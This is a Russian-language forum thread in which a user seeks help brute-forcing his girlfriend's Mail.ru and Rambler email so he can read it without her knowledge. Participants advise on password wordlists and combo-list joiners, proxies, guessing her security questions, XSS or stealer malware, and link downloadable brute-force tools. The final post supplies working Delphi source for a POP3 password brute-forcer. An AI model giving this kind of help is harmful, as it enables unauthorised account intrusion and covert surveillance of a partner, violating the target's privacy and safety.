Помогите разобратсья со словарями для Mail.Ru Brute никак немогу понять что там надо сделать чтобы прога начала работать. Объясните или может у кого есть библиотека или где ее скачать? За ранее всем гиганское спасибо
Наверняка на сайте, где скачивал сию прогу, есть форум с мануалом или обсуждение её принципа работы. Пасс-листы можешь скачать здесь и здесь. Далее, в зависимости от того какой у тебя брут. Если поле -pass- (или там WordList), то указываешь путь непосредственно к своему словарику. А если -mail;pass-, то пользуйся джойнером, который объединит в пасс-лист мыло жертвы+каждый отдельный пароль из словаря. З.Ы. А вообще, полезнее всего первоначально читать форум. Здесь неоднократно на идентичные вопросы уже отвечали.
Сделал листы кстати библиотеки на zloy.org я ненашел(а очень жаль если есть линк то дайте). Ну вообщем сделал запустил брут и никакого результата просто сканит(у меня стоит локалка 2 мегабита скорость)и прокси я не использую Кто какие решения подскажет
на своем мыле проверял? если на своем работает, а чужой не ищет, то уж звиняй, но с брутом можно и до старости в некоторых случаях просидеть. От словаря всё зависит. Некоторые пасс из 12-ти символов (верхний-нижн. регистр, цифры + приаттаченная фамилия бабушки русскими буквами). Такой брутом бесполезно найти.)) Тут уж пробуй СоцИнж., либо ХSS-уязвимости, либо пинч.) Многое здесь знающими людьми уже описано.
посоветую прокси юзать, хотя с локалкой на 2 мб, лучше платную юзать скорость будет на уровне. Если по словарям не катит, то можно познакомится с жертвой поближе, узнать все что нужно и писать в тех. поддержку, хотя тоже может не прокатить, им почти всегда не хватает данных. Ты жертву знаешь? Дай ее логин. По нему можно приблизительно сказать какой сложности пароль
Типа критерий оценки от написания? А если бы мой ник был бы таким, какие я использую пароли: cens censored censored! CeNSoReD -=[*CeNSoReD*]=-
Да саму жертву я знаю это моя девушка.Просто хочу знать что там у нее на почте творится. Ее мыло [email protected] [email protected] и еще один адресс есть но для начала хотябы один из этих открыть
Ну так попробовал бы простейший метод СИ. Ответь на доп. вопросы её. Про собаку или про пасспорт. Неужели не знаешь.
Да вот попробовал ее почту на рабмлере открыть там такой вопросс сикретный кто там и я никак немогу понять какбы она ответила. А второй вопосс на майл ру простейший но я никогда не интересовался фамилией ее матери(девичьей).А сейчас спросить немогу так как нахожусь заграницей
вот ты попал, неучели соц инженерия даже для своих девушек уже не катит? Мне моя когда-то даже пароль сама дала Правда там ничего интересног не было
Ха ну сам подумай если она тебе пароль свой дала так на ее почте и немогло быть ничего компромитирующего. Вседа ведь лучше читать тогда когда она об этом даже не подозревает.Так на всякий случай.Доверяй но проверяй
Хм. А у вас вообще брут от Злого работает? У меня на директ его банят, а на прокси он пароли не находит. (
[QUOTE=seeattact]Да я ломанул её почту mail.ru за 5 секунд на жержи пасс 123456789[/QUOTE] ГдЕ СкаЧАть эТОТ бРУт. еСЛИ У ТЕбя есть п0делис... в д0лгах не останусь!!! [email protected]
Я ломанул с помощью Brutus AET2 прогу можеш скачать здесь http://www.web-hack.ru/download/info.php?go=12 если словари нужны будут - стучи в ICQ 177633
а луче ты сам напиши brutforcer Нам понадобится: Borland Delphi 7, прямые руки и следущие компоненты: 4 шт. Edit, 1кнопка, IdAntiFreeze1 c закладки Indy Misc (но можно и без него), IdPOP с закладки Indy Clients. Шкодим: procedure TForm1.Button1Click(Sender: TObject); var LoginStrings, PassStrings: TStrings; i,j: integer; begin LoginStrings:=TStringList.Create; PassStrings:=TStringList.Create; LoginStrings.LoadFromFile(Edit1.Text); PassStrings.LoadFromFile(Edit2.Text); IdPOP.Host:=Edit3.Text; IdPOP.Port:=StrToInt(Edit4.Text); for i:=0 to LoginStrings.Count-1 do for j:=0 to PassStrings.Count-1 do begin IdPOP.Username:=LoginStrings.Strings; IdPOP.Password:=PassStrings.Strings[j]; try IdPOP.Connect; except end; if IdPOP.Connected then begin Application.MessageBox(PChar('Имя:'+LoginStrings.Strings+ 'Пароль:'+PassStrings.Strings[j]),'Пароль найден!'); IdPOP.Disconnect; Exit; end; end; LoginStrings.Free; PassStrings.Free; end;